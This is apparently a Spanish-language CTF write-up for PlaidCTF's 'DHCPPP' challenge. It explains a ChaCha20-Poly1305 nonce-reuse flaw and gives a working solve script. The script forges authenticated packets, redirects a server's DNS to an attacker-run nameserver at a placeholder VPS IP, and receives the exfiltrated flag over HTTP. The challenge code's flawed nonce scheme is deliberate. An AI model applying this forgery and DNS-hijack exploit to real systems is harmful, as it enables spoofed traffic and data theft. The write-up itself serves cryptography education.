DHCPPP
14 minutos de lectura
Se nos proporciona el código fuente en Python del servidor que tiene la flag:
import time, zlib
import secrets
import hashlib
import requests
from Crypto.Cipher import ChaCha20_Poly1305
import dns.resolver
CHACHA_KEY = secrets.token_bytes(32)
TIMEOUT = 1e-1
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
def calc_crc(msg):
return zlib.crc32(msg).to_bytes(4, "little")
def sha256(msg):
return hashlib.sha256(msg).digest()
RNG_INIT = secrets.token_bytes(512)
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
Análisis del código fuente
El servidor nos permite conectarnos usando una conexión TCP, y se nos pide que enviemos un paquete:
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
El paquete que enviamos es procesado por DHCPServer
y FlagServer
, y la respuesta (si la hay) se muestra después.
Análisis de FlagServer
Dentro del constructor, vemos que se define una dirección MAC y usa un objeto dns
para resolver las URL. Luego, envía un paquete a DHCPServer
:
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
La flag se utiliza cada vez que enviamos un paquete al FlagServer
y la parte del mensaje comienza con \x03
:
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
# ...
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
Como se puede ver, la flag se envía a http://example.com/<flag>
. Obsérvese que el dominio example.com
se resuelve usando el objeto dns
. Por lo tanto, el objetivo es controlar el servidor de nombre de ese objeto dns
, para que podamos decir que example.com
resuelve a una URL controlada por nosotros.
De hecho, un mensaje que comienza con \x02
se puede usar para cambiar la configuración de los servidores de nombre en el objeto dns
:
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
Sin embargo, no podemos enviar este mensaje directamente porque se supone que la parte de contenido del paquete está cifrada.
Análisis de DHCPServer
Esta clase es muy similar a FlagServer
. Este es el constructor:
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
Básicamente define algunas direcciones IP, una dirección MAC y otras cosas.
Esta es la función que procesa los paquetes entrantes:
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
Como se puede ver, la parte del mensaje debe comenzar con \x01
, y el contenido es dev_name
, que se pasa a get_lease
. La respuesta se envía de regreso, junto con las direcciones MAC.
Esta es get_lease
:
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
Básicamente, el servidor agrega el dev_name
dentro de la lista leases
, toma una dirección IP de la lista ips
y la usa para generar el paquete. Posteriormente, el paquete se cifrado, utilizando el resultado de get_entropy_from_lavalamps
como clave y un código CRC al final:
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
Aquí vemos que si el nombre del lease no es rngserver
, entonces el resultado siempre será el mismo (el hash SHA256 de RNG_INIT
, que desconocido pero fijo):
RNG_INIT = secrets.token_bytes(512)
Análisis del cifrado
Estas son las funciones para cifrar y descifrar:
CHACHA_KEY = secrets.token_bytes(32)
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
El servidor está utilizando ChaCha20-Poly1305. La vulnerabilidad aquí es una reutilización del nonce. Observe que el nonce se genera utilizando un hash SHA256, y depende de msg[:32] + nonce[:32]
. Nótese que nonce
(como parámetro de encrypt
) es el resultado de get_entropy_from_lavalamps
, que siempre es lo mismo. Por lo tanto, si forzamos a que msg[:32]
sea siempre lo mismo, tendremos una situación de reutilización del nonce.
Solución
Tendremos que analizar cómo funciona ChaCha20-Poly1305 por detrás.
Básicamente, es un cifrado en flujo (ChaCha20) combinado con un código de autenticación de mensaje Poly1305.
El uso de un cifrado de flujo a secas no es seguro cuando conoce parte del texto claro, porque podemos usar XOR para obtener el key stream.
Esta vez, no podemos simplemente hacer eso porque tenemos Poly1305. Por lo tanto, necesitamos encontrar una manera de generar un tag válido para el mensaje cifrado que queremos enviar a FlagServer
Reutilización del nonce en Poly1305
La manera en la que funciona Poly1305 es creando un polinomio sobre el cuerpo $\mathbb{F}_p$, donde $p = 2^{130} - 5$, que es un número primo.
$$ P(x) = c_1 x^q + c_2 x^{q - 1} + \dots + c_q x \mod{p} $$
Donde los coeficientes $c_i$ son los bytes del mensaje que se va a autenticar en bloques de 16 bytes. Y el tag se genera como:
$$ \mathrm{tag} = \left(P(r) + s\right) \mod{2^{128}} $$
Donde $r$ y $s$ son valores secretos de clave.
Hay algunos matices omitidos del cifrado, pero el concepto clave del ataque de reutilización del nonce es que podemos obtener dos tags diferentes de dos mensajes diferentes que tienen los mismos valores de $r$ y $s$ porque dependen de la clave (que siempre es la mismo) y el nonce (que podemos forzar a que sea igual).
Como resultado, tenemos
$$ \begin{cases} \mathrm{tag} = \left((c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}) + s\right) \mod{2^{128}} \\ \mathrm{tag}' = \left((c'_1 r^q + c'_2 r^{q - 1} + \dots + c'_q r \mod{p}) + s\right) \mod{2^{128}} \end{cases} $$
Si restamos las expresiones, podemos deshacernos de $s$:
$$ \mathrm{tag} - \mathrm{tag}' = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) \mod{2^{128}} $$
Además, podemos deshacernos del $\mod{2^{128}}$ añadiendo $k \cdot 2^{128}$ para $-4 \leqslant k < 4$:
$$ \mathrm{tag} - \mathrm{tag}' + k \cdot 2^{128} = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) $$
El valor de $k$ está en ese rango porque el resultado de la evaluación polinomio se reduce primero en módulo $p = 2^{130} - 5$, y cumple que $p > 3 \cdot 2^{128}$.
Por lo tanto, podemos probar estos valores de $k$ y obtener candidatos por $r$ al encontrar las raíces del polinomio con coeficientes $c_i - c’_i$.
Una vez que obtenemos el valor de $r$, hallar $s$ es trivial:
$$ s = \mathrm{tag} - \left(c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}\right) \mod{2^{128}} \\ $$
En este punto, podremos cifrar cualquier mensaje y autenticarlo correctamente, por lo que podremos modificar los servidores de nombre del objeto dns
y obtener la flag.
Implementación
Usaré estas funciones auxiliares para enviar/recibir paquetes a/de DHCPServer
:
def send_recv(data: bytes) -> bytes:
io.sendlineafter(b'> ', data.hex().encode())
return bytes.fromhex(io.recvline().decode())
def parse_enc(enc: bytes):
ct = enc[:-28]
tag = enc[-28:-12]
nonce = enc[-12:]
return ct, tag, nonce
En primer lugar, vaciamos la lista ips
, para tener más control sobre la dirección IP de los leases. Luego, forzamos la situación de reutilización del nonce (necesitamos que las direcciones IP sean las mismas, por eso necesitamos nuevamente $64 - 3$ consultas adicionales) usando los mismos primeros 12 bytes en dev_name
:
io = get_process()
DHCP_MAC = bytes.fromhex('1b 7d 6f 49 37 c9')
FLAG_MAC = bytes.fromhex('53 79 82 b5 97 eb')
for _ in range(3, 64 - 1):
send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12)
data1 = send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12 + b'B')
for _ in range(3, 64):
send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12)
data2 = send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12 + b'C')
dst1, src1, lease1 = data1[:6], data1[6:12], data1[12:]
dst2, src2, lease2 = data2[:6], data2[6:12], data2[12:]
assert lease1[0] == lease2[0] == 2
ct1, tag1, nonce1 = parse_enc(lease1[1:-4])
ct2, tag2, nonce2 = parse_enc(lease2[1:-4])
assert nonce1 == nonce2
En este punto, tenemos dos mensajes diferentes ct1
y ct2
con el mismo nonce.
Podemos obtener fácilmente el key stream del cifrado en flujo usando XOR y un texto claro conocido:
pkt = bytearray(
bytes([int(x) for x in '192.168.1.2'.split('.')]) +
bytes([int(x) for x in '192.168.1.1'.split('.')]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
b'A' * 12 + b'B' +
b'\0'
)
assert len(ct1) == len(pkt)
key_stream = xor(ct1, pkt)
A continuación, vamos a convertir los textos cifrados que se autenticarán al formato requerido por Poly1305 (véase pycryptodome para más detalles):
def update(msg):
return msg + b'\0' * (16 - (len(msg) & 0x0F)) + long_to_bytes(0, 8)[::-1] + long_to_bytes(len(msg), 8)[::-1]
msg1 = update(ct1)
msg2 = update(ct2)
En este punto, podemos usar una variable simbólica $r$ y calcular los polinomios para los dos tags (adaptado de python-poly1305):
result1 = int.from_bytes(tag1, 'little')
result2 = int.from_bytes(tag2, 'little')
mod1305 = (1 << 130) - 5
r_sym = PolynomialRing(GF(mod1305), 'r').gens()[0]
q1 = (len(msg1) + 15) // 16
tot1 = 0
for i in range(q1):
sub = msg1[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot1 = (tot1 + num) * r_sym
q2 = (len(msg2) + 15) // 16
tot2 = 0
for i in range(q2):
sub = msg2[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot2 = (tot2 + num) * r_sym
Una vez aquí, podemos probar los diferentes valores de $k$ y encontrar las raíces de los polinomios. Después de algunas pruebas, podemos ver que el valor de $r$ que estamos buscando es como máximo un número entero de 124 bits, que es útil para descartar otras raíces:
possible_r = set()
for k in range(-4, 4 + 1):
roots = (tot1 - tot2 - (result1 - result2) + k * 2 ** 128).roots()
for root, mult in roots:
possible_r.add(int(root))
for r in possible_r:
if int(r).bit_length() <= 124:
break
Entonces, tenemos $r$ y $s$:
s = (result1 - int(tot1.subs({r_sym: r}))) % (2 ** 128)
io.info(f'{r = }')
io.info(f'{s = }')
En este punto, podemos falsificar cualquier mensaje cifrado con una etiqueta de autenticación válida:
def forge(msg, r, s):
q = (len(msg) + 15) // 16
tot = 0
for i in range(q):
sub = msg[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot = (tot + num) * r
tot = tot % mod1305
result = (tot + s) % (1 << 128)
return long_to_bytes(result)[::-1]
assert tag1 == forge(update(ct1), r, s)
assert tag2 == forge(update(ct2), r, s)
Finalmente, podemos cifrar el mensaje para modificar los servidores de nombre de FlagServer
:
pkt = bytearray(
bytes([127, 0, 0, 1]) +
bytes([0, 0, 0, 0]) +
bytes([255, 255, 255, 0]) +
bytes(int(x) for x in VPS_IP.split('.')) +
bytes(int(x) for x in VPS_IP.split('.')) +
b'A' * 12 + b'X' +
b'\0'
)
crc = calc_crc(pkt)
ct = xor(pkt, key_stream)
tag = forge(update(ct), r, s)
data = b'\0' * 6 + FLAG_MAC + b'\x02' + (ct + tag + nonce1) + crc
io.sendlineafter(b'> ', data.hex().encode())
assert b'DEBUG' in io.recvline()
Si todo va bien, podemos enviar el mensaje que comienza con \x03
y esperar a que llegue la flag:
data = b'\0' * 6 + FLAG_MAC + b'\x03'
io.sendlineafter(b'> ', data.hex().encode())
while not done:
pass
io.close()
os._exit(0)
Servidores DNS y HTTP
Ambos servidores DNS (nserver
) y HTTP (Flask) se implementan en el mismo script y se ejecutan en segundo plano usando threads:
done = False
VPS_IP = '12.34.56.78'
dns_server = NameServer('dns', Settings(
console_log_level=logging.FATAL,
server_address='0.0.0.0',
server_port=53,
))
http_server = Flask('http')
logging.getLogger('werkzeug').disabled = True
sys.modules['flask.cli'].show_server_banner = lambda *_: None
@dns_server.rule('example.com', ['A'])
def example_a_records(query: Query):
return A(query.name, VPS_IP)
@http_server.route('/<flag>')
def flag(flag):
global done
log.success(flag)
sleep(1)
done = True
return '', 200
Thread(target=dns_server.run, args=()).start()
Thread(target=http_server.run, kwargs={'host': '0.0.0.0', 'port': 80}).start()
Flag
Si ejecutamos el script y todo funciona bien, obtendremos la flag:
$ python3 solve.py dhcppp.chal.pwni.ng 1337
[+] Opening connection to dhcppp.chal.pwni.ng on port 1337: Done
[*] r = 212311510927065049612449277573465294
[*] s = 245714001342194252468026868232236808134
[+] PCTF{d0nt_r3u5e_th3_n0nc3_d4839ed727736624}
[*] Closed connection to dhcppp.chal.pwni.ng port 1337
El script completo se puede encontrar aquí: solve.py
.